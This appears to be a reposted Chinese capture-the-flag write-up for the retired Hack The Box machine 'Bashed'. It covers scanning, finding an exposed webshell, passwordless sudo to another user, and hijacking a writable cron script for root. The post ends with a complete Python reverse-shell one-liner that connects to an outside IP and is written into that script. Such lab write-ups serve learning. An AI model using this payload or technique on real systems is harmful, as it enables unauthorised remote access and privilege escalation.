本篇文章仅用于技术交流学习和研究的目的，严禁使用文章中的技术用于非法目的和破坏，否则造成一切后果与发表本文章的作者无关

靶机是作者购买VIP使用退役靶机操作，显示IP地址为10.10.10.68

本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描

执行命令 autorecon 10.10.10.68 -o ./Bashed-autorecon

根据上面的扫描结果只开放了一个80端口，然后爆破目录发现了如上一些目录，都访问了以下，其中发现dev这个目录路径下面直接存放了webshell，具体如下

到tmp目录下，使用wget下载一个php反弹shell到本地kali

顺手执行了sudo -l发现存在用户scriptmanager可以无需密码直接切换

通过枚举在运行的进程和间隔的时间戳发现/script下面的存在计划任务，且该目录下的test.py文件含有可写，可改权限，枚举进程的工具：https://github.com/DominicBreuker/pspy

所以直接写入python的反弹shell代码至此文件，然后本地kali监听端口等待反弹shell即可提权，写入反弹shell代码

echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.5",8833));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' > /scripts/test.py

本文分享自微信公众号 - 白帽安全技术复现（baimaofuxian）。
如有侵权，请联系 support@oschina.cn 删除。
本文参与“OSC源创计划”，欢迎正在阅读的你也加入，一起分享。